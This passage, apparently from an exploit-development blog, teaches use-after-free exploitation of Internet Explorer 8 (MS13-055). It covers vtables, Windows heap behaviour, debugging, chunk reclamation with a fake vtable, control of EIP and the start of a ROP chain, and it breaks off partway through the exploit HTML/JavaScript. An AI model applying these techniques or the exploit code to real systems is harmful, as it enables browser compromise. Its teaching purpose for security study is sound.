As was aforesaid above, the vulnerability we will be taking a look at is a use-after-free. More specifically, MS13-055, which is titled as Microsoft Internet Explorer CAnchorElement Use-After-Free. What exactly does this mean? Use-after-free vulnerabilities are well documented, and fairly common. There are great explanations out there, but for brevity and completeness sake I will take a swing at explaining them. Essentially what happens is this - a chunk of memory (chunks are just contiguous pieces of memory, like a buffer. Each piece of memory, known as a block, on x86 systems are 0x8 bytes, or 2 DWORDS. Don’t over-think them) is allocated by the heap manager (on Windows there is the front-end allocator, known as the Low-Fragmentation Heap, and the standard back-end allocator. We will talk about these in the a future section). At some point during the program’s lifetime, this chunk of memory, which was previously allocated, is “freed”, meaning the allocation is cleaned up and can be re-used by the heap manager again to service allocation requests.

Let’s say the allocation was at the memory address 0x15000. Let’s say the chunk, when it was allocated, contained 0x40 bytes of 0x41 characters. If we dereferenced the address 0x15000, you could expect to see 0x41s (this is psuedo-speak and should just be taken at a high level for now). When this allocation is freed, if you go back and dereference the address again, you could expect to see invalid memory (e.g. something like ???? in WinDbg), if the address hasn’t been used to service any allocation requests, and is still in a free state.

Where the vulnerability comes in is the chunk, which was allocated but is now freed, is still referenced/leveraged by the program, although in a “free” state. This usually causes a crash, as the program is attempting to either access and/or dereference memory that simply isn’t valid anymore. This usually causes some sort of exception, resulting in a program crash.

Now that the definition of what we are attempting to take advantage of is out of the way, let’s talk about how this condition arises in our specific case.

C++ Classes, Constructors, Destructors, and Virtual Functions

You may or may not know that browsers, although they interpret/execute JavaScript, are actually written in C++. Due to this, they adhere to C++ nomenclature, such as implementation of classes, virtual functions, etc. Let’s start with the basics and talk about some foundational C++ concepts.

A class in C++ is very similar to a typical struct you may see in C. The difference is, however, in classes you can define a stricter scope as to where the members of the class can be accessed, with keywords such as private or public. By default, members of classes are private, meaning the members can only be accessed by the class and by inherited classes. We will talk about these concepts in a second. Let’s give a quick code example.

#include <iostream>
using namespace std;

// This is the main class (base class)
class classOne
{
  public:

    // This is our user defined constructor
    classOne()
    {
      cout << "Hello from the classOne constructor" << endl;
    }

    // This is our user defined destructor
    ~classOne()
    {
      cout << "Hello from the classOne destructor!" << endl;
    }

  public:
    virtual void sharedFunction(){};        // Prototype a virtual function
    virtual void sharedFunction1(){};       // Prototype a virtual function
};

// This is a derived/sub class
class classTwo : public classOne
{
  public:

    // This is our user defined constructor
    classTwo()
    {
      cout << "Hello from the classTwo constructor!" << endl;
    };

    // This is our user defined destructor
    ~classTwo()
    {
      cout << "Hello from the classTwo destructor!" << endl;
    };

  public:
    void sharedFunction()               
    {
      cout << "Hello from the classTwo sharedFunction()!" << endl;    // Create A DIFFERENT function definition of sharedFunction()
    };

    void sharedFunction1()
    {
      cout << "Hello from the classTwo sharedFunction1()!" << endl;   // Create A DIFFERENT function definition of sharedFunction1()
    };
};

// This is another derived/sub class
class classThree : public classOne
{
  public:

    // This is our user defined constructor
    classThree()
    {
      cout << "Hello from the classThree constructor" << endl;
    };

    // This is our user defined destructor
    ~classThree()
    {
      cout << "Hello from the classThree destructor!" << endl;
    };
  
  public:
    void sharedFunction()
    {
      cout << "Hello from the classThree sharedFunction()!" << endl;  // Create A DIFFERENT definition of sharedFunction()
    };

    void sharedFunction1()
    {
      cout << "Hello from the classThree sharedFunction1()!" << endl;   // Create A DIFFERENT definition of sharedFunction1()
    };
};

// Main function
int main()
{
  // Create an instance of the base/main class and set it to one of the derivative classes
  // Since classTwo and classThree are sub classes, they inherit everything classOne prototypes/defines, so it is acceptable to set the address of a classOne object to a classTwo object
  // The class 1 constructor will get called twice (for each classOne object created), and the classTwo + classThree constructors are called once each (total of 4)
  classOne* c1 = new classTwo;
  classOne* c1_2 = new classThree;

  // Invoke the virtual functions
  c1->sharedFunction();
  c1_2->sharedFunction();
  c1->sharedFunction1();
  c1_2->sharedFunction1();

  // Destructors are called when the object is explicitly destroyed with delete
  delete c1;
  delete c1_2;
}

The above code creates three classes: one “main”, or “base” class (classOne) and then two classes which are “derivative”, or “sub” classes of the base class classOne. (classTwo and classThree are the derivative classes in this case).

Each of the three classes has a constructor and a destructor. A constructor is named the same as the class, as is proper nomenclature. So, for instance, a constructor for class classOne is classOne(). Constructors are essentially methods that are called when an object is created. Its general purpose is that they are used so that variables can be initialized within a class, whenever a class object is created. Just like creating an object for a structure, creating a class object is done as such: classOne c1. In our case, we are creating objects that point to a classOne class, which is essentially the same thing, but instead of accessing members directly, we access them via pointers. Essentially, just know that whenever a class object is created (classOne* cl in our case), the constructor is called when creating this object.

In addition to each constructor, each class also has a destructor. A destructor is named ~nameoftheClass(). A destructor is something that is called whenever the class object, in our case, is about to go out of scope. This could be either code reaching the end of execution or, as is in our case, the delete operator is invoked against one of the previously declared class objects (cl and cl_2). The destructor is the inverse of the constructor - meaning it is called whenever the object is being deleted. Note that a destructor does not have a type, does not accept function arguments, and does not return a value.

In addition to the constructor and destructor, we can see that classOne prototypes two “virtual functions”, with empty definitions. Per Microsoft’s documentation, a virtual function is “A member function that you expect to be redefined in a derived class”. If you are not innately familiar with C++, as I am not, you may be wondering what a member function is. A member function, simply put, is just a function that is defined in a class, as a member. Here is an example struct you would typically see in C:

struct mystruct{
  int var1;
  int var2;
}

As you know, the first member of this struct is int var1. The same bodes true with C++ classes. A function that is defined in a class is also a member, hence the term “member function”.

The reason virtual functions exists, is it allows a developer to prototype a function in a main class, but allows for the developer to redefine the function in a derivative class. This works because the derivative class can inherit all of the variables, functions, etc. from its “parent” class. This can be seen in the above code snippet, placed here for brevity: classOne* c1 = new classTwo;. This takes a derivative class of classOne, which is classTwo, and points the classOne object (c1) to the derivative class. It ensures that whenever an object (e.g. c1) calls a function, it is the correctly defined function for that class. So basically think of it as a function that is declared in the main class, is inherited by a sub class, and each sub class that inherits it is allowed to change what the function does. Then, whenever a class object calls the virtual function, the corresponding function definition, appropriate to the class object invoking it, is called.

Running the program, we can see we acquire the expected result:

Now that we have armed ourselves with a basic understanding of some key concepts, mainly constructors, destructors, and virtual functions, let’s take a look at the assembly code of how a virtual function is fetched.

Note that it is not necessary to replicate these steps, as long as you are following along. However, if you would like to follow step-by-step, the name of this .exe is virtualfunctions.exe. This code was compiled with Visual Studio as an “Empty C++ Project”. We are building the solution in Debug mode. Additionally, you’ll want to open up your code in Visual Studio. Make sure the program is set to x64, which can be done by selecting the drop down box next to Local Windows Debugger at the top of Visual Studio.

Before compiling, select Project > nameofyourproject Properties. From here, click C/C++ and click on All Options. For the Debug Information Format option, change the option to Program Database /Zi.

After you have completed this, follow these instructions from Microsoft on how to set the linker to generate all the debug information that is possible.

Now, build the solution and then fire up WinDbg. Open the .exe in WinDbg (note you are not attaching, but opening the binary) and execute the following command in the WinDbg command window: .symfix. This will automatically configure debugging symbols properly for you, allowing you to resolve function names not only in virtualfunctions.exe, but also in Windows DLLs. Then, execute the .reload command to refresh your symbols.

After you have done this, save the current workspace with File > Save Workspace. This will save your symbol resolution configuration.

For the purposes of this vulnerability, we are mostly interested the virtual function table. With that in mind, let’s set a breakpoint on the main function with the WinDbg command bp virtualfunctions!main. Since we have the source file at our disposal, WinDbg will automatically generate a View window with the actual C code, and will walk through the code as you step through it.

In WinDbg, step through the code with t to until we hit c1->sharedFunction().

After reaching the beginning of the virtual function call, let’s set breakpoints on the next three instructions after the instruction in RIP. To do this, leverage bp 00007ff7b67c1703, etc.

Stepping into the next instruction, we can see that the value pointed to by RAX is going to be moved into RAX. This value, according to WinDbg, is virtualfunctions!classTwo::vftable.

As we can see, this address is a pointer to the “vftable” (a virtual function table pointer, or vptr). A vftable is a virtual function table, and it essentially is a structure of pointers to different virtual functions. Recall earlier how we said “when a class calls a virtual function, the program will know which function corresponds to each class object”. This is that process in action. Let’s take a look at the current instruction, plus the next two.

You may not be able to tell it now, but this sort of routine (e.g. mov reg, [ptr] + call [ptr]) is indicative of a specific virtual function being fetched from the virtual function table. Let’s walk through now to see how this is working. Stepping through the call, the vptr (which is a pointer to the table), is loaded into RAX. Let’s take a look at this table now.

Although these symbols are a bit confusing, notice how we have two pointers here - one is ?sharedFunctionclassTwo and the other is ?sharedFunction1classTwo. These are actually pointers to the two virtual functions within classTwo!

If we step into the call, we can see this is a call that redirects to a jump to the sharedFunction virtual function defined in classTwo!

Next, keep stepping into instructions in the debugger, until we hit the c1->sharedFunction1() instruction. Notice as you are stepping, you will eventually see the same type of routine done with sharedFunction within classThree.

Again, we can see the same type of behavior, only this time the call instruction is call qword ptr [rax+0x8]. This is because of the way virtual functions are fetched from the table. The expertly crafted Microsoft Paint chart below outlines how the program indexes the table, when there are multiple virtual functions, like in our program.

As we recall from a few images ago, where we dumped the table and saw our two virtual function addresses. We can see that this time program execution is going to invoke this table at an offset of 0x8, which is a pointer to sharedFunction1 instead of sharedFunction this time!

Stepping through the instruction, we hit sharedFunction1.

After all of the virtual functions have executed, our destructor will be called. Since we only created two classOne objects, and we are only deleting those two objects, we know that only the classOne destructor will be called, which is evident by searching for the term “destructor” in IDA. We can see that the j_operator_delete function will be called, which is just a long and drawn out jump thunk to the UCRTBASED Windows API function _free_dbg, to destroy the object. Note that this would normally be a call to the C Runtime function free, but since we built this program in debug mode, it defaults to the debug version.

Great! We now know how C++ classes index virtual function tables to retrieve virtual functions associated with a given class object. Why is this important? Recall this will be a browser exploit, and browsers are written in C++! These class objects, which almost certainly will use virtual functions, are allocated on the heap! This is very useful to us.

Before we move on to our exploitation path, let’s take just a few extra minutes to show what a use-after-free potentially looks like, programmatically. Let’s add the following snippet of code to the main function:

// Main function
int main()
{
  classOne* c1 = new classTwo;
  classOne* c1_2 = new classThree;

  c1->sharedFunction();
  c1_2->sharedFunction();

  delete c1;
  delete c1_2;

  // Creating a use-after-free situation. Accessing a member of the class object c1, after it has been freed
  c1->sharedFunction();
}

Rebuild the solution. After rebuilding, let’s set WinDbg to be our postmortem debugger. Open up a cmd.exe session, as an administrator, and change the current working directory to the installation of WinDbg. Then, enter windbg.exe -I.

This command configured WinDbg to automatically attach and analyze a program that has just crashed. The above addition of code should cause our program to crash.

Additionally, before moving on, we are going to turn on a feature of the Windows SDK known as gflags.exe. glfags.exe, when leveraging its PageHeap functionality, provides extremely verbose debugging information about the heap. To do this, in the same directory as WinDbg, enter the following command to enable PageHeap for our process gflags.exe /p /enable C:\Path\To\Your\virtualfunctions.exe. You can read more about PageHeap here and here. Essentially, since we are dealing with memory that is not valid, PageHeap will aid us in still making sense of things, by specifying “patterns” on heap allocations. E.g. if a page is free, it may fill it with a pattern to let you know it is free, rather than just showing ??? in WinDbg, or just crashing.

Run the .exe again, after adding the code, and WinDbg should fire up.

After enabling PageHeap, let’s run the vulnerable code. (Note you may need to right click the below image and open it in a new tab)

Very interesting, we can see a crash has occurred! Notice the call qword ptr [rax] instruction we landed on, as well. First off, this is a result of PageHeap being enabled, meaning we can see exactly where the crash occurred, versus just seeing a standard access violation. Recall where you have seen this? This looks to be an attempted function call to a virtual function that does not exist! This is because the class object was allocated on the heap. Then, when delete is called to free the object and the destructor is invoked, it destroys the class object. That is what happened in this case - the class object we are trying to call a virtual function from has already been freed, so we are calling memory that isn’t valid.

What if we were able to allocate some heap memory in place of the object that was freed? Could we potentially control program execution? That is going to be our goal, and will hopefully result in us being able to get stack control and obtain a shell later. Lastly, let’s take a few moments to familiarize ourself with the Windows heap, before moving on to the exploitation path.

The Windows Heap Manager - The Low Fragmentation Heap (LFH), Back-End Allocator, and Default Heaps

tl;dr -The best explanation of the LFH, and just heap management in general on Windows, can be found at this link. Chris Valasek’s paper on the LFH is the de facto standard on understanding how the LFH works and how it coincides with the back-end manager, and much, if not all, of the information provided here, comes from there. Please note that the heap has gone through several minor and major changes since Windows 7, and it should be considered techniques leveraging the heap internals here may not be directly applicable to Windows 10, or even Windows 8.

It should be noted that heap allocations start out technically by querying the front-end manager, but since the LFH, which is the front-end manager on Windows, is not always enabled - the back-end manager ends up being what services requests at first.

A Windows heap is managed by a structure known as HeapBase, or ntdll!_HEAP. This structure contains many members to get/provide applicable information about the heap.

The ntdll!_HEAP structure contains a member called BlocksIndex. This member is of type _HEAP_LIST_LOOKUP, which is a linked-list structure. (You can get a list of active heaps with the !heap command, and pass the address as an argument to dt ntdll_HEAP). This structure is used to hold important information to manage free chunks, but does much more.

Next, here is what the HeapBase->BlocksIndex (_HEAP_LIST_LOOKUP)structure looks like.

The first member of this structure is a pointer to the next _HEAP_LIST_LOOKUP structure in line, if there is one. There is also an ArraySize member, which defines up to what size chunks this structure will track. On Windows 7, there are only two sizes supported, meaning this member is either 0x80, meaning the structure will track chunks up to 1024 bytes, or 0x800, which means the structure will track up to 16KB. This also means that for each heap, on Windows 7, there are technically only two of these structures - one to support the 0x80 ArraySize and one to support the 0x800 ArraySize.

HeapBase->BlocksIndex, which is of type _HEAP_LIST_LOOKUP, also contains a member called ListHints, which is a pointer into the FreeLists structure, which is a linked-list of pointers to free chunks available to service requests. The index into ListHints is actually based on the BaseIndex member, which builds off of the size provided by ArraySize. Take a look at the image below, which instruments another _HEAP_LIST_LOOKUP structure, based on the ExtendedLookup member of the first structure provided by ntdll!_HEAP.

For example, if ArraySize is set to 0x80, as is seen in the first structure, the BaseIndex member is 0, because it manages chunks 0x0 - 0x80 in size, which is the smallest size possible. Since this screenshot is from Windows 10, we aren’t limited to 0x80 and 0x800, and the next size is actually 0x400. Since this is the second smallest size, the BaseIndex member is increased to 0x80, as now chunks sizes 0x80 - 0x400 are being addressed. This BaseIndex value is then used, in conjunction with the target allocation size, to index ListHints to obtain a chunk for servicing an allocation. This is how ListHints, a linked-list, is indexed to find an appropriately sized free chunk for usage via the back-end manager.

What is interesting to us is that the BLINK (back link) of this structure, ListHints, when the front-end manager is not enabled, is actually a pointer to a counter. Since ListHints will be indexed based on a certain chunk size being requested, this counter is used to keep track of allocation requests to that certain size. If 18 consecutive allocations are made to the same chunk size, this enables the LFH.

To be brief about the LFH - the LFH is used to service requests that meet the above heuristics requirements, which is 18 consecutive allocations to the same size. Other than that, the back-end allocator is most likely going to be called to try to service requests. Triggering the LFH in some instances is useful, but for the purposes of our exploit, we will not need to trigger the LFH, as it will already be enabled for our heap. Once the LFH is enabled, it stays on by default. This is useful for us, as now we can just create objects to replace the freed memory. Why? The LFH is also LIFO on Windows 7, like the stack. The last deallocated chunk is the first allocated chunk in the next request. This will prove useful later on. Note that this is no longer the case on more updated systems, and the heap has a greater deal of randomization.

In any event, it is still worth talking about the LFH in its entierty, and especially the heap on Windows. The LFH essentially optimizes the way heap memory is distributed, to avoid breaking, or fragmenting memory into non-contiguous blocks, so that almost all requests for heap memory can be serviced. Note that the LFH can only address allocations up to 16KB. For now, this is what we need to know as to how heap allocations are serviced.

Now that we have talked about the different heap manager, let’s talk about usage on Windows.

Processes on Windows have at least one heap, known as the default process heap. For most applications, especially those smaller in size, this is more than enough to provide the applicable memory requirements for the process to function. By default it is 1 MB, but applications can extend their default heaps to bigger sizes. However, for more memory intensive applications, additional algorithms are in play, such as the front-end manager. The LFH is the front-end manager on Windows, starting with Windows 7.

In addition to the aforesaid heaps/heap managers, there is also a segment heap, which was added with Windows 10. This can be read about here.

Please note that this explanation of the heap can be more integrally explained by Chris’ paper, and the above explanations are not a comprehensive list, are targeted more towards Windows 7, and are listed simply for brevity and because they are applicable to this exploit.

The Vulnerability And Exploitation Strategy

Now that we have talked about C++ and heap behaviors on Windows, let’s dive into the vulnerability itself. The full exploit script is available on the Exploit-DB, by way of the Metasploit team, and if you are confused by the combination of Ruby and HTML/JavaScript, I have gone ahead and stripped down the code to “the trigger code”, which causes a crash.

Going back over the vulnerability, and reading the description, this vulnerability arises when a CPhraseElement comes after a CTableRow element, with the final node being a sub-table element. This may seem confusing and illogical at first, and that is because it is. Don’t worry so much about the order of the code first, as to the actual root cause, which is that when a CPhraseElement’s outerText property is reset (freed). However, after this object has been freed, a reference still remains to it within the C++ code. This reference is then passed down to a function that will eventually try to fetch a virtual function for the object. However, as we saw previously, accessing a virtual function for a freed object will result in a crash - and this is what is happening here. Additionally, this vulnerability was published at HitCon 2013. You can view the slides here, which contains a similar proof of concept above. Note that although the elements described are not the same name as the elements in the HTML, note that when something like CPhraseElement is named, it refers to the C++ class that manages a certain object. So for now, just focus on the fact we have a JavaScript function that essentially creates an element, and then sets the outerText property to NULL, which essentially will perform a “free”.

So, let’s get into the crash. Before starting, note that this is all being done on a Windows 7 x86 machine, Service Pack 0. Additionally, the browser we are focusing on here is Internet Explorer 8. In the event the Windows 7 x86 machine you are working on has Internet Explorer 11 installed, please make sure you uninstall it so browsing defaults to Internet Explorer 8. A simple Google search will aid you in removing IE11. Additionally, you will need WinDbg to debug. Please use the Windows SDK version 8 for this exploit, as we are on Windows 7. It can be found here.

After saving the code as an .html file, opening it in Internet Explorer reveals a crash, as is expected.

Now that we know our POC will crash the browser, let’s set WinDbg to be our postmortem debugger, identically how we did earlier, to identify if we can’t see why this crash ensued.

Running the POC again, we can see that our crash registered in WinDbg, but it seems to be nonsensical.

We know, according the advisory, this is a use-after-free condition. We also know it is the result of fetching a virtual function from an object that no longer exists. Knowing this, we should expect to see some memory being dereferenced that no longer exists. This doesn’t appear to be the case, however, and we just see a reference to invalid memory. Recall earlier when we turned on PageHeap! We need to do the same thing here, and enable PageHeap for Internet Explorer. Leverage the same command from earlier, but this time specify iexplore.exe.

After enabling PageHeap, let’s rerun the POC.

Interesting! The instruction we are crashing on is from the class CElement. Notice the instruction the crash occurs on is mov reg, dword ptr[eax+70h]. If we unsassembly the current instruction pointer, we can see something that is very reminiscent of our assembly instructions we showed earlier to fetch a virtual function.

Recall last time, on our 64-bit system, the process was to fetch the vptr, or pointer to the virtual function table, and then to call what this pointer points to, at a specific offset. Dereferencing the vptr, at an offset of 0x8, for instance, would take the virtual function table and then take the second entry (entry 1 is 0x0, entry 2 is 0x8, entry 3 would be 0x18, entry 4 would be 0x18, and so on) and call it.

However, this methodology can look different, depending on if you are on a 32-bit system or a 64-bit system, and compiler optimization can change this as well, but the overarching concept remains. Let’s now take a look at the above image.

What is happening here is the a fetching of the vptr via [ecx]. The vptr is loaded into ECX and then is dereferenced, storing the pointer into EAX. The EAX register, which now contains the pointer to the virtual function table, is then going to take the pointer, go 0x70 bytes in, and dereference the address, which would be one of the virtual functions (which ever function is stored at virtual_function_table + 0x70)! The virtual function is placed into EDX, and then EDX is called.

Notice how we are getting the same result as our simple program earlier, although the assembly instructions are just slightly different? Looking for these types of routines are very indicative of a virtual function being fetched!

Before moving on, let’s recall a former image.

Notice the state of EAX whenever the function crashes (right under the Access Violation statement). It seems to have a pattern of sorts f0f0f0f0. This is the gflags.exe pattern for “a freed allocation”, meaning the value in EAX is in a free state. This makes sense, as we are trying to index an object that simply no longer exists!

Rerun the POC, and when the crash occurs let’s execute the following !heap command: !heap -p -a ecx.

Why ECX? As we know, the first thing the routine for fetching a virtual function does is load the vptr into EAX, from ECX. Since this is a pointer to the table, which was allocated by the heap, this is technically a pointer to the heap chunk. Even though the memory is in a free state, it is still pointed to by the value [ecx] in this case, which is the vptr. It is only until we dereference the memory can we see this chunk is actually invalid.

Moving on, take a look at the call stack we can see the function calls that led up to the chunk being freed. In the !heap command, -p is to use a PageHeap option, and -a is to dump the entire chunk. On Windows, when you invoke something such as a C Runtime function like free, it will eventually hand off execution to a Windows API. Knowing this, we know that the “lowest level” (e.g. last) function call within a module to anything that resembles the word “free” or “destructor” is responsible for the freeing. For instance, if we have an .exe named vuln.exe, and vuln.exe calls free from the MSVCRT library (the Microsoft C Runtime library), it will actually eventually hand off execution to KERNELBASE!HeapFree, or kernel32!HeapFree, depending on what system you are on. The goal now is to identify such behavior, and to determine what class actually is handling the free that is responsible for freeing the object (note this doesn’t necessarily mean this is the “vulnerable piece of code”, it just means this is where the free occurs).

Note that when analyzing call stacks in WinDbg, which is simply a list of function calls that have resulted to where execution currently resides, the bottom function is where the start is, and the top is where execution currently is/ended up. Analyzing the call stack, we can see that the last call before kernel32 or ntdll is hit, is from the mshtml library, and from the CAnchorElement class. From this class, we can see the destructor is what kicks off the freeing. This is why the vulnerability contains the words CAnchorElement Use-After-Free!

Awesome, we know what is causing the object to be freed! Per our earlier conversation surrounding our overarching exploitation strategy, we could like to try and fill the invalid memory with some memory we control! However, we also talked about the heap on Windows, and how different structures are responsible for determining which heap chunk is used to service an allocation. This heavily depends on the size of the allocation.

In order for us to try and fill up the freed chunk with our own data, we first need to determine what the size of the object being freed is, that way when we allocate our memory, it will hopefully be used to fill the freed memory slot, since we are giving the browser an allocation request of the exact same size as a chunk that is currently freed (recall how the heap tries to leverage existing freed chunks on the back-end before invoking the front-end).

Let’s step into IDA for a moment to try to reverse engineer exactly how big this chunk is, so that way we can fill this freed chunk with out own data.

We know that the freeing mechanism is the destructor for the CAnchorElement class. Let’s search for that in IDA. To do this, download IDA Freeware for Windows on a second Windows machine that is 64-bit, and preferably Windows 10. Then, take mshtml.dll, which is found in C:\Windows\system32 on the Windows 7 exploit development machine, copy it over to the Windows machine with IDA on it, and load it. Note that there may be issues with getting the proper symbols in IDA, since this is an older DLL from Windows 7. If that is the case, I suggest looking at PDB Downloader to quickly obtain the symbols locally, and import the .pdb files manually.

Now, let’s search for the destructor. We can simply search for the class CAnchorElement and look for any functions that contain the word destructor.

As we can see, we found the destructor! According to the previous stack trace, this destructor should make a call to HeapFree, which actually does the freeing. We can see that this is the case after disassembling the function in IDA.

Querying the Microsoft documentation for HeapFree, we can see it takes three arguments: 1. A handle to the heap where the chunk of memory will be freed, 2. Flags for freeing, and 3. A pointer to the actual chunk of memory to be freed.

At this point you may be wondering, “none of those parameters are the size”. That is correct! However, we now see that the address of the chunk that is going to be freed will be the third parameter passed to the HeapFree call. Note that since we are on a 32-bit system, functions arguments will be passed through the __stdcall calling convention, meaning the stack is used to pass the arguments to a function call.

Take one more look at the prototype of the previous image. Notice the destructor accepts an argument for an object of type CAnchorElement. This makes sense, as this is the destructor for an object instantiated from the CAnchorElement class. This also means, however, there must be a constructor that is capable of creating said object as well! And as the destructor invokes HeapFree, the constructor will most likely either invoke malloc or HeapAlloc! We know that the last argument for the HeapFree call in the destructor is the address of the actual chunk to be freed. This means that a chunk needs to be allocated in the first place. Searching again through the functions in IDA, there is a function located within the CAnchorElement class called CreateElement, which is very indicative of a CAnchorElement object constructor! Let’s take a look at this in IDA.

Great, we see that there is in fact a call to HeapAlloc. Let’s refer to the Microsoft documentation for this function.

The first parameter is again, a handle to an existing heap. The second, are any flags you would like to set on the heap allocation. The third, and most importantly for us, is the actual size of the heap. This tells us that when a CAnchorElement object is created, it will be 0x68 bytes in size. If we open up our POC again in Internet Explorer, letting the postmortem debugger taking over again, we can actually see the size of the free from the vulnerability is for a heap chunk that is 0x68 bytes in size, just as our reverse engineering of the CAnchorElement::CreateElement function showed!

This proves our hypothesis, and now we can start editing our script to see if we can’t control this allocation. Before proceeding, let’s disable PageHeap for IE8 now.

Now with that done, let’s update our POC with the following code.

The above POC starts out again with the trigger, to create the use-after-free condition. After the use-after-free is triggered, we are creating a string that has 104 bytes, which is 0x68 bytes - the size of the freed allocation. This by itself doesn’t result in any memory being allocated on the heap. However, as Corelan points out, it is possible to create an arbitrary DOM element and set one of the properties to the string. This action will actually result in the size of the string, when set to a property of a DOM element, being allocated on the heap!

Let’s run the new POC and see what result we get, leveraging WinDbg once again as a postmortem debugger.

Interesting! This time we are attempting to dereference the address 0x41414141, instead of getting an arbitrary crash like we did at the beginning of this blog, by triggering the original POC without PageHeap enabled! The reason for this crash, however, is much different! Recall that the heap chunk causing the issue is in ECX, just like we have previously seen. However, this time, instead of seeing freed memory, we can actually see our user-controlled data now allocates the heap chunk!

Now that we have finally figured out how we can control the data in the previously freed chunk, we can bring everything in this tutorial full circle. Let’s look at the current program execution.

We know that this is a routine to fetch a virtual function from a virtual function table. The first instruction, mov eax, dword ptr [ecx] takes the virtual function table pointer, also known as the vptr, and loads it into the EAX register. Then, from there, this vptr is dereferenced again, which points to the virtual function table, and is called at a specified offset. Notice how currently we control the ECX register, which is used to hold the vptr.

Let’s also take a look at this chunk in context of a HeapBase structure.

As we can see, in the heap our chunk is a part of, the LFH is activated (FrontEndHeapType of 0x2 means the LFH is in use). As mentioned earlier, this will allow us to easily fill in the freed memory with our own data, as we have just seen in the images above. Remember that the LFH is also LIFO, like the stack, on Windows 7. The last deallocated chunk is the first allocated chunk in the next request. This has proven useful, as we were able to find out the correct size for this allocation and service it.

This means that we own the 4 bytes that was previously used to hold the vptr. Let’s think now - what if it were possible to construct our own fake virtual function table, with 0x70 entries? What we could do is, with our primitive to control the vptr, we could replace the vptr with a pointer to our own “virtual function table”, which we could allocate somewhere in memory. From there, we could create 70 pointers (think of this as 70 “fake functions”) and then have the vptr we control point to the virtual function table.

By program design, the program execution would naturally dereference our fake virtual function table, it would fetch whatever is at our fake virtual function table at an offset of 0x70, and it would invoke it! The goal from here is to construct our own vftable and to make the 70th “function” in our table a pointer to a ROP chain that we have constructed in memory, which will then bypass DEP and give us a shell!

We know now that we can fill our freed allocation with our own data. Instead of just using DOM elements, we will actually be using a technique to perform precise reallocation with HTML+TIME, as described by Exodus Intelligence. I opted for this method to just simply avoid heap spraying, which is not the focus of this post. The focus here is to understand use-after-free vulnerabilities and understand JavaScript’s behavior. Note that on more modern systems, where a primitive such as this doesn’t exist anymore, this is what makes use-after-frees more difficult to exploit, the reallocation and reclaiming of freed memory. It may require additional reverse engineering to find objects that are a suitable size, etc.

Essentially what this HTML+TIME “method”, which only works for IE8, does is instead of just placing 0x68 bytes of memory to fill up our heap, which still results in a crash because we are not supplying pointers to anything, just raw data, we can actually create an array of 0x68 pointers that we control. This way, we can force the program execution to actually call something meaningful (like our fake virtual table!).

Take a look at our updated POC. (You may need to open the first image in a new tab)

Again, the Exodus blog will go into detail, but what essentially is happening here is we are able to leverage SMIL (Synchronized Multimedia Integration Language) to, instead of just creating 0x68 bytes of data to fill the heap, create 0x68 bytes worth of pointers, which is much more useful and will allow us to construct a fake virtual function table.

Note that heap spraying is something that is an alternative, although it is relatively scrutinized. The point of this exploit is to document use-after-free vulnerabilities and how to determine the size of a freed allocation and how to properly fill it. This specific technique is not applicable today, as well. However, this is the beginning of myself learning browser exploitation, and I would expect myself to start with the basics.

Let’s now run the POC again and see what happens.

Great news, we control the instruction pointer! Let’s examine how we got here. Recall that we are executing code within the same routine in CElement::Doc we have been, where we are fetching a virtual function from a vftable. Take a look at the image below.

Let’s start with the top. As we can see, EIP is now set to our user-controlled data. The value in ECX, as has been true throughout this routine, contains the address of the heap chunk that has been the culprit of the vulnerability. We have now controlled this freed chunk with our user-supplied 0x68 byte chunk.

As we know, this heap chunk in ECX, when dereferenced, contains the vptr, or in our case, the fake vptr. Notice how the first value in ECX, and every value after, is 004.... These are the array of pointers the HTML+TIME method returned! If we dereference the first member, it is a pointer to our fake vftable! This is great, as the value in ECX is dereferenced to fetch our fake vptr (one of the pointers from the HTML+TIME method). This then points to our fake virtual function table, and we have set the 70th member to 42424242 to prove control over the instruction pointer. Just to reiterate one more time, remember, the assembly for fetching a virtual function is as follows:

mov eax, dword ptr [ecx]   ; This gets the vptr into EAX, from the value pointed to by ECX
mov edx, dword ptr [eax+0x70]  ; This takes the vptr, dereferences it to obtain a pointer to the virtual function table at an offset of 0x70, and stores it in EDX
call edx       ; The function is called

So what happened here is that we loaded our heap chunk, that replaced the freed chunk, into ECX. The value in ECX points to our heap chunk. Our heap chunk is 0x68 bytes and consists of nothing but pointers to either the fake virtual function table (the 1st pointer) or a pointer to the string vftable(the 2nd pointer and so on). This can be seen in the image below (In WinDbg poi() will dereference what is within parentheses and display it).

This value in ECX, which is a pointer to our fake vtable, is also placed in EAX.

The value in EAX, at an offset of 0x70 is then placed into the EDX register. This value is then called.

As we can see, this is 42424242, which is the target function from our fake vftable! We have now successfully created our exploit primitive, and we can begin with a ROP chain, where we can exchange the EAX and ESP registers, since we control EAX, to obtain stack control and create a ROP chain.

I Mean, Come On, Did You Expect Me To Skip A Chance To Write My Own ROP Chain?

First off, before we start, it is well known IE8 contains some modules that do not depend on ASLR. For these purposes, this exploit will not take into consideration ASLR, but I hope that true ASLR bypasses through information leaks are something that I can take advantage of in the future, and I would love to document those findings in a blog post. However, for now, we must learn to walk before we can run. At the current state, I am just learning about browser exploitation, and I am not there yet. However, I hope to be soon!

It is a well known fact that, while leveraging the Java Runtime Environment, version 1.6 to be specific, an older version of MSVCR71.dll gets loaded into Internet Explorer 8, which is not compiled with ASLR. We could just leverage this DLL for our purposes. However, since there is already much documentation on this, we will go ahead and just disable ASLR system wide and constructing our own ROP chain, to bypass DEP, with another library that doesn’t have an “automated ROP chain”. Note again, this is the first post in a series where I hope to increasingly make things more modern. However, I am in my infancy in regards to learning browser exploitation, so we are going to start off by walking instead of running. This article describes how you can disable ASLR system wide.

Great. From here, we can leverage the rp++ utility to enumerate ROP gadgets for a given DLL. Let’s search in mshtml.dll, as we are already familiar with it!

To start, we know that our fake virtual function table is in EAX. We are not limited to a certain size here, as this table is pointed to by the first of 26 DWORDS (for a total of 0x68, or 104 bytes) that fills up the freed heap chunk. Because of this, we can exchange the EAX register (which we control) with the ESP register. This will give us stack control and allow us to start forging a ROP chain.

Parsing the ROP gadget output from rp++, we can see a nice ROP gadget exists

Let’s set update our POC with this ROP gadget, in place of the former 42424242 DWORD that is in place of our fake virtual function.

<!DOCTYPE html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<meta><?IMPORT namespace="t" implementation="#default#time2"></meta>
  <script>

    window.onload = function() {

      // Create the fake vftable of 70 DWORDS (70 "functions")
      vftable = "\u4141\u4141";

      for (i=0; i < 0x70/4; i++)
      {
        // This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtaul function being fetched at [eax+0x70]
        // which is now controlled by our own chunk
